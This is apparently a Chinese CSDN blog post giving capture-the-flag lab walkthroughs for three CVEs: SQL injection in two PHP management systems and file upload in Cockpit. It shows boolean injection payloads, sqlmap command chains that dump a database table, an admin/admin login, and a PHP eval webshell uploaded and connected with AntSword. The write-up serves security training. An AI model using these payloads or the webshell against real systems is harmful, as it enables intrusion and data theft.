shuashuashua

最新推荐文章于 2024-08-26 22:53:01 发布
最新推荐文章于 2024-08-26 22:53:01 发布
阅读量682 收藏 12
点赞数 12
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_77961060/article/details/141017022
版权

CVE-2023-2130

靶标介绍:

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

通过标靶介绍可以知道在/admin/suppliers/view_details.php页面存在参数id有sql注入漏洞,访问该页面

当参数id=1' and 1=1 --+时正确,id=1' and 1=2 --+时错误,说明存在sql注入漏洞。

抓包,把请求信息保存到5.txt文件中,sqlmap梭哈

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D purchase_order_db --tables

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag -C flag --dump

得到flag

CVE-2023-1313

靶标介绍:

cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装

一个登录界面,他的提升通过/install来运行安装,访问/install,但是重定向到了原登录界面,dirsearch进行目录扫描,

 可以看到存在该目录,但是不能够访问,尝试弱口令登录

admin    /      admin

成功登录进去,

找上传页面

上传一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

上传成功后下载,浏览后得到上传目录

访问该路径

可以看到配置文件界面,说明上传成功,连接蚁剑

CVE-2023-0562

靶标介绍:

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

存在mysqli扩展,有数据库,可能存在sql注入,寻找注入点

在这个地方搜索会进行POST传参,然后重定向到该页面

抓包测试

把抓包的内容放到5.txt文件中

searchinput=*    *会默认把该参数作为注入点

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D blmsdb --tables

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag -C flag --dump

小丑皇,王中王
关注
  • 12
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
leetcode卡-AlgorithmShuaShuaShua:算法ShuaShuaShua
07-06
leetcode卡 欢迎来到算法刷刷刷 一、简介 打卡方式 打开issue,选择对应的题目提交comment 打卡格式 #思路: #代码: #复杂度分析: 时间复杂度: 空间复杂度: ...在每周四晚上之前提交本周选择的题目 ...
leetcode316-Go4Jobs:ShuaShuaShua~让你保持动力。每天进步。相互竞争。得到你梦寐以求的工作
06-30
ShuaShuaShua~让你保持动力。 每天进步。 得到你梦寐以求的工作。 如果可能,请每天在此处更新您的进度,即使您没有取得任何进展。 我相信看到别人的进步会让你有动力,让你很快赶上。 请随意在此处提交您的 ...
如何使用双重IP代理实现更安全的网络访问
IPIPGO的博客
08-26 369
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
网络安全教程初级简介
网络研究观
08-26 396
网络安全包括一系列技术、流程和实践,用于保护网络、设备、应用程序和数据免受攻击、盗窃或损坏等威胁。
【宝马中国-注册/登录安全分析报告】
08-26 900
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
基于视觉识别引擎+深度学习实现安全保障数字化的智慧城管开源了
weixin_63598920的博客
08-26 355
智慧城管视觉监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。
等保测评中的安全测试方法
w13359990065的博客
08-26 466
通过物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评等多层次的综合评估,可以有效识别系统中的安全隐患,提升信息系统的整体安全防护能力,满足国家相关法律法规的要求,助力企业提升行业竞争力。在等保测评中,安全测试方法的有效实施离不开专业的测评团队和科学的测评流程。测评团队需具备丰富的安全测试经验和专业知识,能够准确识别系统中的安全风险并提出切实可行的整改建议。首先,等保测评中的安全测试方法涵盖了多个层面,包括但不限于物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评。
92.WEB渗透测试-信息收集-Google语法(6)
计算机王的博客
08-22 416
web渗透测试
物联网安全框架:构建安全互联的未来世界
A526847的博客
08-26 290
物联网安全框架的构建是一个复杂而系统的工程,需要设备制造商、软件开发商、服务提供商和用户等多方共同努力。通过加强数据加密、身份认证、人工智能和区块链等技术的应用,推动统一安全标准的制定和实施,我们可以构建一个安全、可靠、互联的未来世界。在这个过程中,每一个参与者的努力都至关重要,让我们携手共进,为物联网的健康发展贡献自己的力量。
深入探讨Linux中的EncFS:安全、灵活的加密文件系统
prop428的博客
08-26 523
深入探讨Linux中的EncFS:安全、灵活的加密文件系统
注册安全分析报告:助通信息
最新发布
Explinks的博客
08-26 639
上海助通信息科技在近10年的历程中,以专业的服务团队、国际化、高标准的工作流程为超过10万余家企事业单位提供提供国内领先的网络接入服务和互联网行业增值服务,技术实力雄厚,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。
[ICS] 物理安全
08-26 695
#工业控制系统气泡模型理论 #端口锁定 #物理端口安全 #设施监控 #爆炸物检测计划 #USB 端口阻塞
网络安全-安全渗透简介和安全渗透环境准备
weixin_57370131的博客
08-26 592
安全渗透简介和安全渗透测试环境准备。
在野漏洞的应急响应流程
INSBUG的博客
08-26 519
许多时候,对于负责安全工作又不太擅长安全漏洞技术的人员而言,如何应对突发漏洞是工作中主要的难点,这里的突发漏洞指的是两类:一类是通过新闻、咨询推送,被社会舆论所有关注的CVE漏洞,比如前段时间所谓的核弹级别Windows Server漏洞,一类是没有引起足够社会关注,但又在安全行业流传的0-day漏洞,但也仅限于传说,而很少有人真正见过的0-day漏洞。在漏洞的影响范围确定之后,可以通过机构的资产管理工具快速判断漏洞影响的资产范围,对于软件类或配置类的漏洞,则可能需要通过PoC进行手动扫描和评估。
以数据安全筑牢新时代旅游安全之基,硬盘文件数据销毁,硬盘销毁
2301_79618370的博客
08-26 205
在这个大数据时代,让我们共同携手,以《旅游大数据安全与隐私保护要求(征求意见稿)》为指引,筑牢旅游数据安全之基,为新时代旅游安全工作保驾护航。让游客在享受美好旅游体验的同时,无需担忧数据安全问题,让旅游行业在数字化的浪潮中蓬勃发展。征求意见稿对旅游大数据的通用安全目标、安全与隐私保护生命周期管理、安全与隐私保护运维管理、安全与隐私保护监控管理以及典型旅游应用场景大数据安全等方面作出了规范。而在典型旅游应用场景大数据安全方面,征求意见稿针对在线旅游平台、旅游景区、酒店等不同场景,提出了具体的安全要求。
企业产品网络安全日志8月26日-威胁感知建设,三方漏洞升级
KD的疯狂实验室
08-26 131
其中工作之一是打通AWS DNS Firewall 与 Security Hub。当发生威胁事件时,Security Hub能接收到情报通知。三方依赖组件漏洞升级,无论对于哪个公司都是一个挑战性的事情。逐步升级也是对现有产品的一个负责。今天跟部分基础服务开发进行深入沟通,了解了当前升级的挑战,特别是对稳定性的影响。一味的升级,其实在没有架构师规划的情况下,实际并不可控。两者不能直通,需要使用lambda进行触发。2 当前方法未触发风险,但未来可能触发的。就可以按照这个方向逐步升级或规避。
openGuass——管理用户安全
数据库学习ing
08-26 585
通过GRANT把角色授予用户后,用户即具有了角色的所有权限。例如,可以为设计、开发和维护人员创建不同的角色,将角色GRANT给用户后,再向每个角色中的用户授予其工作所需数据的差异权限。用户密码存储在系统表pg_authid中,为防止用户密码泄露,openGauss对用户密码进行加密存储,所采用的加密算法由配置参数password_encryption_type决定。openGauss为用户提供了自动锁定和解锁用户、手动锁定和解锁异常用户和删除不再使用的用户等一系列的安全措施,保证数据安全
叉车(工业车辆)安全管理系统,云端监管人车信息运营情况方案
jiuxindianzi的博客
08-26 264
国家推行叉车智慧监管,要求新叉车安装安全监控装置。九盾叉车安全管理系统提升管理效率,包括人员授权、超速预警、GPS定位、数据分析等功能,全面管理叉车,提高监管效能。
【有道云-注册安全分析报告】
weixin_46641057的博客
08-26 518
有道云作为网易旗下的网站,采用自家的验证类产品非常正常, 从测试来看,有道云笔记基本采用用户比较友好的滑动验证方式, 该产品稳定并且市场占有率很高, 在一定程度上提高了用户体验, 但安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
四合一气体检测仪:全能守护,安全无忧的创新之选
2201_75812475的博客
08-26 165
它采用先进的传感器技术,能够快速响应并准确测量目标气体的浓度,即使在复杂多变的环境中也能保持稳定的性能。同时,设备内置的高精度算法能够智能分析数据,一旦检测到有害气体浓度超过预设的安全阈值,便会立即发出声光报警,甚至自动启动联动装置(如排风扇、切断阀等),以快的速度控制险情,确保人员安全。四合一气体检测仪,顾名思义,能够同时检测并显示四种不同有害气体的浓度,这通常包括可燃气体(如甲烷、丙烷等)、有毒气体(如一氧化碳、硫化氢)、氧气含量以及可能存在的其他特定有害气体(如二氧化碳、氨气等,具体依据型号而定)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值